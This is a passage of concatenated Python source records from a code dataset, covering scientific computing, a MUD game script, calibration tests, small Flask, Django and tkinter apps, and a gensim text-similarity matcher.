h[i,j] = h[j,i] = Hij(CAs[i], CAs[j],diss[i,j], ks[i,j])\n\n H[i*3: i*3+3, j*3: j*3+3] = h[i,j] \n H[j*3: j*3+3, i*3: i*3+3] = h[i,j]\n \n for i in range(n):\n h[i,i] = - sum([h[i,j] for j in range(n) if j !=i ])\n H[i*3: i*3+3, i*3: i*3+3] = h[i,i]\n \n for i in range(n):\n for j in range(n):\n H[i*3: i*3+3, j*3 : j*3+3] = \\\n H[i*3: i*3+3, j*3 : j*3+3] / mass[i] / mass[j]\n \n return H \n\n\ndef calc_modes(CAs, mass, n=MODE_NM):\n diss = cdist(CAs, CAs) # distance matrix of all C-Alpha atoms \n ks = konrad_force_cons(diss)\n h = build_H(CAs, ks, diss, mass) # build Hessian matrix\n\n n = min(n, 3*len(CAs)-6)\n if n > 20:\n e, v = eigh(h)\n return e[:n+6],v[:,:n+6]\n else:\n return eigsh(h,k=n+6,which='SA')\n\n\ndef main(pdbfile, tar_dir='.', filename='modes.txt', mode_num=MODE_NM):\n PDB_ntuple = read_pdb(pdbfile, unit_nm=True)\n CAs = PDB_ntuple.ca_coords\n e,v = calc_modes(CAs, PDB_ntuple.weight, mode_num)\n\n modefile = join(tar_dir, filename)\n write_modefile(e,v,modefile, PDB_ntuple.residues_full)\n\n return modefile\n\n\nif __name__ == '__main__':\n import sys\n main(sys.argv[1], sys.argv[2], sys.argv[1][:-4]+'_modes_v3.txt', sys.argv[3])\n \n","sub_path":"calc_nm.py","file_name":"calc_nm.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"421813531","text":"from mudwyrm_users.admin.achaea import ScriptState, ScriptError\nfrom mudwyrm_users.admin.achaea.trigger import Trigger, Alias, OnEvent\nfrom mudwyrm_users.admin.achaea.action import Action, Outcome\nfrom mudwyrm_users.admin.achaea.database import Base\n\nfrom mudwyrm_users.admin.achaea.scripts import char\nfrom mudwyrm_users.admin.achaea.scripts.actions import all_actions as actions\n\nimport sqlalchemy as sa\n\np = None\ns = ScriptState()\n\ndef init(processor):\n assert processor is not None\n global p\n p = processor\n \n s.plants_here = []\n s.harvesting = False\n \ndef harvest_echo(text):\n p.echo(\"[Harvesting] %s\" % text)\n \n \n# TODO: achaea.known_plants \n\nclass HarvestRule(Base):\n __tablename__ = 'harvest_rules'\n id = sa.Column(sa.Integer, primary_key=True)\n plant = sa.Column(sa.String, nullable=False, unique=True)\n minimal_amount = sa.Column(sa.String, nullable=False, default='sparse')\n \n def __init__(self, plant, minimal_amount):\n self.plant = plant\n self.minimal_amount = minimal_amount\n\n@Alias(r'^harvest_list$')\ndef harvest_list(match):\n rules = p.db.query(HarvestRule).all()\n if not rules:\n p.echo(\"Harvest list is empty.\")\n else:\n p.echo(\"Harvest list: %s.\" % \", \".join(\"%s (%s)\" % (r.plant, r.minimal_amount) for r in rules))\n \n@Alias(r'^harvest_add (\\w+)$',\n r'^harvest_add (\\w+) (\\w+)$')\ndef harvest_add(match):\n plant = match.group(1).lower()\n minimal_amount = match.group(2).lower() if len(match.groups()) > 1 else 'sparse'\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant).first()\n if not rule:\n rule = HarvestRule(plant, minimal_amount)\n p.db.add(rule)\n p.db.commit()\n else:\n rule.minimal_amount = minimal_amount\n p.db.commit()\n p.echo(\"%s has been added to the harvest list and will be harvested if \"\n \"its amount is greater than or equal to %s.\" % (rule.plant.capitalize(), rule.minimal_amount))\n\n@Alias(r'^harvest_remove (\\w+)$')\ndef harvest_remove(match):\n plant = match.group(1).lower()\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant).first()\n if not rule:\n return p.echo(\"Harvest list doesn't contain %s.\" % plant)\n p.db.delete(rule)\n p.db.commit()\n p.echo(\"%s has been removed from the harvest list.\" % rule.plant.capitalize())\n \n \n@Alias(r'^harvest_start$')\ndef harvest_start(match):\n if s.harvesting:\n return harvest_echo(\"Already harvesting.\")\n if not actions.plant_list.possible():\n return harvest_echo(\"Not ready to harvest yet.\")\n s.harvesting = True\n s.plant_list_updated = False\n harvest_echo(\"Harvesting...\")\n p.act(actions.plant_list)\n \n@Alias(r'^harvest_stop$')\ndef harvest_stop(match):\n s.harvesting = False\n harvest_echo(\"Stopped harvesting.\")\n \nplant_name_translations = {\n \"irid moss\": 'moss',\n \"black cohosh\": 'cohosh',\n \"prickly ash tree\": 'ash',\n \"red elm\": 'elm',\n \"wild ginger\": 'ginger',\n \"lady's slipper\": 'slipper',\n \"cactus weed\": 'weed',\n \"myrrh bush\": 'myrrh',\n \"kuzu vine\": 'kuzu',\n \"kola tree\": 'kola'\n}\n\nplant_amounts = ['sparse', 'moderate', 'plentiful', 'abundant']\n\ngatherables = ['olive', 'nuts', 'lumic', 'fruit', 'vegetable',\n 'sugarcane', 'grain']\n\ndef compare_amounts(a, b):\n return cmp(plant_amounts.index(a), plant_amounts.index(b))\n \ndef harvest_step():\n if not s.harvesting or not s.plant_list_updated or not actions.harvest.possible():\n return\n while s.plants_here:\n plant = s.plants_here.pop(0)\n if plant['short_name'] in plant_name_translations:\n 
plant['short_name'] = plant_name_translations[plant['short_name']]\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant['short_name']).first()\n if rule and compare_amounts(plant['amount'], rule.minimal_amount) >= 0:\n action = actions.gather if plant['short_name'] in gatherables else actions.harvest\n p.act(action, plant['short_name'])\n break\n if not s.plants_here:\n harvest_stop.callback(None)\n\n@OnEvent('PlantListUpdated')\ndef on_plant_list_updated(plants):\n s.plant_list_updated = True\n s.plants_here = plants\n harvest_step()\n \n@OnEvent('PromptLine')\ndef on_prompt_line():\n harvest_step()\n \n#@OnEvent('BalanceChanged')\n#def on_balance_changed(type, value):\n# harvest_step()\n# \n#@OnEvent('StatusChanged')\n#def on_status_changed(type, value):\n# harvest_step()","sub_path":"mudwyrm_users/admin/achaea/scripts/harvesting.py","file_name":"harvesting.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"51270757","text":"\n\nfrom xai.brain.wordbase.nouns._pride import _PRIDE\n\n#calss header\nclass _PRIDED(_PRIDE, ):\n\tdef __init__(self,): \n\t\t_PRIDE.__init__(self)\n\t\tself.name = \"PRIDED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pride\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prided.py","file_name":"_prided.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312264653","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport pandas as pd\nimport random\n\n\n\n##\n\ndef drawSet(ID, df):\n if ID != 'dem':\n train = pd.concat([df.sample(5)] * 3)\n test = df.copy()\n elif ID == 'dem':\n # repeat four times and drop one line\n train = pd.concat([df] * 4)[:15]\n # repeat three times and drop two lines\n test = pd.concat([df] * 3)[:10]\n\n return {'train': train, 'test': test}\n\n##\n\n\nlex = pd.read_csv('../stimuli/vocab.csv')\n\nnoms = pd.read_csv('../stimuli/nouns.csv')\nadjs = lex[lex.cat=='adj']\nnums = lex[lex.cat=='num']\n\n# sample 20 nouns..half will be repeated, thus 30 trials\nnoms = noms.sample(20)\nrepeatNoms = noms.sample(10)\nnoms = pd.concat([noms, repeatNoms])\n\nmods = pd.read_csv('../stimuli/modifiers.csv')\n\n\ninnerID, outerID = cond.split('-')\nIDs = [innerID, outerID]\n\ninOutSets = {ID:mods[mods.cat==ID].sample(frac=1).reset_index(drop=True) for ID in IDs}\n\n\n\ninner, outer = [drawSet(ID, inOutSets[ID]) for ID in IDs]\n \n\n\n\n\n\n# sample 5 adjs or nums to repeat 3 times, thus 15 trials\ncondition = True\nif condition:\n adjs = mods[mods.cat=='adj'].sample(5)\n adjs = pd.concat([adjs, adjs, adjs])\nelse:\n nums = mods[mods.cat=='num'].sample(5)\n nums = pd.concat([nums, nums, nums])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabx = pd.read_csv('stim_list.csv', sep=';')\n\n# v = ['re', 'ru']\n# sh = 'sh'\ncontrastes = [('b', 'p'), ('k', 'g')]\nclabels = ['native', 'emerging']\n\ntrials = []\n\ndef makefour(A, B):\n four = [\n [A, B, A, 'A'],\n [A, B, B, 'B'],\n [B, A, A, 'B'],\n [B, A, B, 'A']\n ]\n return four\n\n\nfor f in abx.frame.unique():\n for n,cont in enumerate(contrastes):\n A = abx[abx.frame==f][abx.phon==cont[0]].iloc[0]['item']\n B = abx[abx.frame==f][abx.phon==cont[1]].iloc[0]['item']\n t1 = makefour(A,B)\n\n # [\n # [A+'_'+v[0], B+'_'+v[1], A+'_'+sh, 'A', cont[0]], # eg b-re p-ru b-sh\n # [A+'_'+v[1], B+'_'+v[0], A+'_'+sh, 'A', cont[0]], # eg b-ru p-re b-sh\n # [A+'_'+v[0], B+'_'+v[1], B+'_'+sh, 'B', cont[1]], # eg b-re p-ru p-sh\n # [A+'_'+v[1], B+'_'+v[0], B+'_'+sh, 'B', cont[1]], # eg b-ru p-re p-sh\n # ]\n\n # A = abx[abx.frame==f][abx.phon==cont[1]].iloc[0]['item']\n # B = abx[abx.frame==f][abx.phon==cont[0]].iloc[0]['item']\n # t2 = makefour(A,B)\n\n # [\n # [A+'_'+v[0], B+'_'+v[1], A+'_'+sh, 'A', cont[1]], # eg p-re b-ru p-sh\n # [A+'_'+v[1], B+'_'+v[0], A+'_'+sh, 'A', cont[1]], # eg p-ru b-re p-sh\n # [A+'_'+v[0], B+'_'+v[1], B+'_'+sh, 'B', cont[0]], # eg p-re b-ru b-sh\n # [A+'_'+v[1], B+'_'+v[0], B+'_'+sh, 'B', cont[0]], # eg p-ru b-re b-sh\n # ]\n\n\n for t in (t1):\n trials.append(t+[clabels[n]]+[f]+['test'])\n\ntrials = pd.DataFrame(trials)\n\nheader = [\n 'A',\n 'B',\n 'X',\n 'bonne_rep',\n # 'cible',\n 'contraste',\n 'frame',\n 'bloc'\n]\n\ntrials.columns = header\n\ntrials.to_csv('trials.csv', index=None) ","sub_path":"POS/English/scripts/contrebalancement.py","file_name":"contrebalancement.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"561417166","text":"import Polish\nimport check\nimport truthtable\nimport paradigm\n\n\ndef main():\n polish1 = Polish.Polish()\n polish2 = Polish.Polish()\n\n a = input('请输入表达式:')\n print(a)\n if check.check(a):\n print('波兰式:' + polish1.get_Polish(a))\n print('逆波兰式:' + polish2.get_R_Polish(a))\n truthtable1 = truthtable.TruthTable(polish2.get_R_Polish(a))\n myparadigm = paradigm.paradigm(a)\n print('主合取范式:' + myparadigm.get_H_paradigm())\n print('主析取范式:' + myparadigm.get_X_paradigm())\n print('真值表')\n print(truthtable1.get_truthtable())\n else:\n print('输入的表达式有误')\n\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"119868830","text":"\"\"\" Unit tests for calibration solution\n\n\n\"\"\"\nimport logging\nimport unittest\n\nimport astropy.units as u\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom data_models.memory_data_models import Skycomponent\nfrom data_models.polarisation import PolarisationFrame\nfrom processing_components.calibration.calibration import solve_gaintable\nfrom processing_components.calibration.operations import apply_gaintable, create_gaintable_from_blockvisibility, \\\n gaintable_summary, qa_gaintable\nfrom processing_components.imaging.base import predict_skycomponent_visibility\nfrom processing_components.simulation.testing_support import simulate_gaintable\nfrom processing_components.simulation.configurations import create_named_configuration\nfrom processing_components.visibility.base import copy_visibility, create_blockvisibility\nfrom processing_components.visibility.operations import divide_visibility\n\nlog = logging.getLogger(__name__)\n\n\nclass TestCalibrationSolvers(unittest.TestCase):\n def setUp(self):\n numpy.random.seed(180555)\n \n def actualSetup(self, sky_pol_frame='stokesIQUV', data_pol_frame='linear', f=None, vnchan=3, ntimes=3):\n self.lowcore = create_named_configuration('LOWBD2', rmax=300.0)\n self.times = (numpy.pi / 43200.0) * numpy.linspace(0.0, 30.0, ntimes)\n self.frequency = numpy.linspace(1.0e8, 1.1e8, vnchan)\n self.channel_bandwidth = numpy.array(vnchan * [self.frequency[1] - self.frequency[0]])\n \n if f is None:\n f = [100.0, 50.0, -10.0, 40.0]\n \n if sky_pol_frame == 'stokesI':\n f = [100.0]\n \n self.flux = numpy.outer(numpy.array([numpy.power(freq / 1e8, -0.7) for freq in self.frequency]), f)\n \n # The phase centre is absolute and the component is specified relative (for now).\n # This means that the component should end up at the position phasecentre+compredirection\n self.phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n self.compabsdirection = SkyCoord(ra=+181.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n self.comp = Skycomponent(direction=self.compabsdirection, frequency=self.frequency, flux=self.flux,\n polarisation_frame=PolarisationFrame(sky_pol_frame))\n self.vis = create_blockvisibility(self.lowcore, self.times, self.frequency, phasecentre=self.phasecentre,\n channel_bandwidth=self.channel_bandwidth, weight=1.0,\n polarisation_frame=PolarisationFrame(data_pol_frame))\n self.vis = predict_skycomponent_visibility(self.vis, self.comp)\n \n def test_solve_gaintable_scalar(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.0)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=True, niter=200)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_normalise(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=0.0, amplitude_error=0.1)\n gt.data['gain'] *= 2.0\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, 
original, phase_only=False, niter=200, normalise_gains=True)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_bandpass(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0], vnchan=128)\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.01, smooth_channels=8)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=False, niter=200, damping=0.5)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_pointsource(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.0)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n point_vis = divide_visibility(self.vis, original)\n gtsol = solve_gaintable(point_vis, phase_only=True, niter=200)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def core_solve(self, spf, dpf, phase_error=0.1, amplitude_error=0.0, leakage=0.0,\n phase_only=True, niter=200, crosspol=False, residual_tol=1e-6, f=None, vnchan=3):\n if f is None:\n f = [100.0, 50.0, -10.0, 40.0]\n self.actualSetup(spf, dpf, f=f, vnchan=vnchan)\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=phase_error, amplitude_error=amplitude_error, leakage=leakage)\n original = copy_visibility(self.vis)\n vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=phase_only, niter=niter, crosspol=crosspol, tol=1e-6)\n vis = apply_gaintable(vis, gtsol, inverse=True)\n residual = numpy.max(gtsol.residual)\n assert residual < residual_tol, \"%s %s Max residual = %s\" % (spf, dpf, residual)\n log.debug(qa_gaintable(gt))\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_vector_phase_only_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, phase_only=True,\n f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_phase_only_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, phase_only=True,\n f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_vector_large_phase_only_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=10.0, phase_only=True,\n f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_large_phase_only_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=10.0,\n phase_only=True, f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_vector_both_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, amplitude_error=0.01,\n phase_only=False, f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_both_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n \n def 
test_solve_gaintable_matrix_both_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True,\n phase_only=False, f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_matrix_both_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_matrix_both_circular_channel(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True, vnchan=4,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/processing_components/test_calibration_solvers.py","file_name":"test_calibration_solvers.py","file_ext":"py","file_size_in_byte":8750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"626563561","text":"\"\"\"\n Entry Point\n\"\"\"\n\nfrom board_app import app, init_db, insert_sample\nfrom argparse import ArgumentParser\n\ndef get_options():\n ap = ArgumentParser()\n ap.add_argument('-i', '--init-db', action='store_true', help='initialize DB before running.')\n ap.add_argument('-s', '--insert-sample', action='store_true', help='insert samples before running.')\n ap.add_argument('-n', '--no-run', action='store_true', help='exit this application without app.run()')\n return ap.parse_args()\n\nif __name__ == '__main__':\n args = get_options()\n if args.init_db:\n init_db()\n if args.insert_sample:\n insert_sample()\n if args.no_run:\n exit(0)\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"504225841","text":"\"\"\"\nDjango settings for mapping project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom django.core.exceptions import ImproperlyConfigured\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nmsg = 'Set the %s environment variable'\n\n\ndef get_env_var(var_name):\n \"\"\"\n Rather than raising a key error we can give a more informative message\n \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n error_msg = msg % var_name\n raise ImproperlyConfigured(error_msg)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'r%o^yd4mfi*9ulqhdpw)*f53%mvy=)i3^g%fdukvfob1=e6q=^'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n 'accounts',\n 'location',\n 'south',\n 'rest_framework',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'mapping.urls'\n\nWSGI_APPLICATION = 'mapping.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n# DB_USER = get_env_var('DB_USER')\n# DB_PASSWORD = get_env_var('DB_PASSWORD')\n# DB_HOST = get_env_var('DB_HOST')\n# DB_NAME = get_env_var('DB_NAME')\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': 'gistest',\n 'USER': 'brent',\n 'PASSWORD': 'weasel',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nAUTH_USER_MODEL = 'accounts.ZUser'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),\n 'PAGINATE_BY': 10\n}\n","sub_path":"mapping/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"289591303","text":"from flask import Flask\nimport mysql.connector\nimport json\n\napp = Flask(__name__)\n\n\ndef students():\n config = {\n 'user': 'root',\n 'password': 'root',\n 'host': 'db',\n 'port': '3306',\n 'database': 'my_database'\n }\n connection = mysql.connector.connect(**config)\n cursor = connection.cursor()\n cursor.execute('SELECT * FROM students')\n results = [(name, surname, speciality_name) for (name, surname, speciality_name) in cursor]\n cursor.close()\n connection.close()\n return results\n\n\n@app.route('/')\ndef index():\n return json.dumps({'students': students()})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"homework_completed/HW#5 Docker/docker_advanced_app/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"218785340","text":"from promises.models import Promise\nfrom promises.nlp import title2nouns, stopwords, pos_tagger_for_model\n\nfrom gensim.models.doc2vec import TaggedDocument\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom gensim import corpora, models, similarities\nimport logging\nfrom itertools import tee\n\nlogger = logging.getLogger('xproject')\n\nclass QuerysetDocIterator(object):\n \"\"\"\n Iterator that turns a queryset into documents suitable for gensim.\n transform should be a callable than turns a model object into a tuple of (text, labels)\n \"\"\"\n def __init__(self, queryset, transform=None):\n self.queryset = queryset\n if not transform:\n self.transform = lambda obj: (str(obj), [obj.pk])\n else:\n self.transform = transform\n\n def __iter__(self):\n \"Iterator over queryset, retrieves data in chunks\"\n chunk_size = 500\n queryset = self.queryset\n try:\n last_pk = queryset.order_by('-pk')[:1].get()['pk']\n except ObjectDoesNotExist:\n return\n \n pk = 0\n queryset = queryset.order_by('pk')\n idx = -1\n while pk < last_pk:\n for row in queryset.filter(pk__gt=pk)[:chunk_size]:\n idx += 1\n pk = row['pk']\n doc = self.transform(row)\n yield TaggedDocument(words=doc[0], tags=[idx, pk])\n\n\nclass DocumentMatcher(object):\n lsi = None\n\n def __init__(self, queryset, document_transform=None):\n self.queryset = queryset\n self.document_transform = document_transform\n\n def get_queryset(self):\n return self.queryset\n\n def get_document_iterator(self, queryset):\n return QuerysetDocIterator(queryset, transform=self.document_transform)\n\n def build_model(self):\n logger.debug('Matcher - Retrieving documents...')\n queryset = self.get_queryset()\n documents = list(self.get_document_iterator(queryset))\n \n dictionary_ko = corpora.Dictionary.load('/data/ko.dict')\n\n num_topics = 40\n\n logger.debug('Matcher - Building Lsi model...')\n # Generate Lsi model for promise text corpus\n corpus = [dictionary_ko.doc2bow(text.words) for text in documents]\n # Train Lsi model\n self.lsi = models.LsiModel(corpus, id2word=dictionary_ko, num_topics=num_topics)\n # Transform corpus to LSI space and index it\n self.index = similarities.MatrixSimilarity(self.lsi[corpus])\n \n self.dictionary_ko = dictionary_ko\n self.documents = documents\n\n def most_similar(self, text, n=99, threshold=0.6):\n \"\"\"\n Gets the n documents most similar to the text.\n This analyzes the text for nouns, so please use short texts (like titles) only.\n Returns list of (promise_id, score) tuples\n \"\"\"\n if not self.lsi:\n self.build_model()\n\n tagged_text = pos_tagger_for_model(text)\n\n logger.debug('Matcher - Searching for documents similar to %s (%s)' % (text, ' '.join(tagged_text)))\n\n # Convert text to bag of words\n vec_bow = self.dictionary_ko.doc2bow(tagged_text)\n # Convert the query to LSI space\n vec_lsi = self.lsi[vec_bow]\n # Perform a similarity query against the corpus\n sims = [item + (self.documents[item[0]].tags,) for item in enumerate(self.index[vec_lsi])]\n if threshold:\n sims = filter(lambda item: item[1] >= threshold, sims)\n # Return the similarities sorted by descending score\n if not sims:\n logger.debug('Matcher - No matches for %s (n=%d, threshold=%.2f)' % (text, n, threshold))\n return []\n sims = sorted(sims, key=lambda item: -item[1])\n logger.debug('Matcher - %d matches for %s (n=%d, threshold=%.2f)' % (len(sims), text, n, threshold))\n return sims[:n]\n\nclass PromiseMatcher(DocumentMatcher):\n def __init__(self):\n self.document_transform = lambda p: 
(pos_tagger_for_model(p['title']), [p['pk']], )\n \n def get_queryset(self):\n return Promise.objects.filter(person__mayor_for_province=\"서울특별시\").values('pk', 'title')\n #return Promise.objects.filter(person__mayor_for_province=\"서울특별시\").values('pk', 'title')\n\n# Global instance of promise matcher\npromise_matcher = PromiseMatcher()\n","sub_path":"web/promises/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
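The `most_similar` method in the record above runs a bag-of-words → LSI projection → cosine-similarity pipeline. The same gensim pipeline on a toy corpus, with no dependence on the project's dictionary file or taggers:

```python
from gensim import corpora, models, similarities

texts = [["cat", "sits", "mat"],
         ["dog", "chases", "cat"],
         ["stock", "market", "falls"]]

dictionary = corpora.Dictionary(texts)
corpus = [dictionary.doc2bow(t) for t in texts]
lsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)
index = similarities.MatrixSimilarity(lsi[corpus])

query = dictionary.doc2bow(["cat", "dog"])
scores = sorted(enumerate(index[lsi[query]]), key=lambda pair: -pair[1])
print(scores)   # document 1 ("dog chases cat") should rank first
```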
+{"seq_id":"184992596","text":"import tkinter\n\nmain = tkinter.Tk()\n\ndef move_left():\n lb.place(relx = 0, rely = 0, anchor=\"nw\")\n\ndef move_right():\n lb.place(relx = 1, rely = 0, anchor=\"ne\")\n\ndef close():\n main.destroy()\n\nlb = tkinter.Label(main, text = \"Label\")\nlb.place(relx=0.5, rely=0)\n\nmove_left_button = tkinter.Button(main, text = \"Move left\", command = move_left)\nmove_left_button.place(relx = 0, rely = 1, anchor=\"sw\")\n\nclose_button = tkinter.Button(main, text = \"Close\", command = close)\nclose_button.place(relx = 0.5, rely = 1, anchor=\"s\")\n\nmove_right_button = tkinter.Button(main, text = \"Move right\", command = move_right)\nmove_right_button.place(relx = 1, rely = 1, anchor=\"se\")\n\nmain.mainloop()\n","sub_path":"Tk_Toolkit/OldBook/place_3.py","file_name":"place_3.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
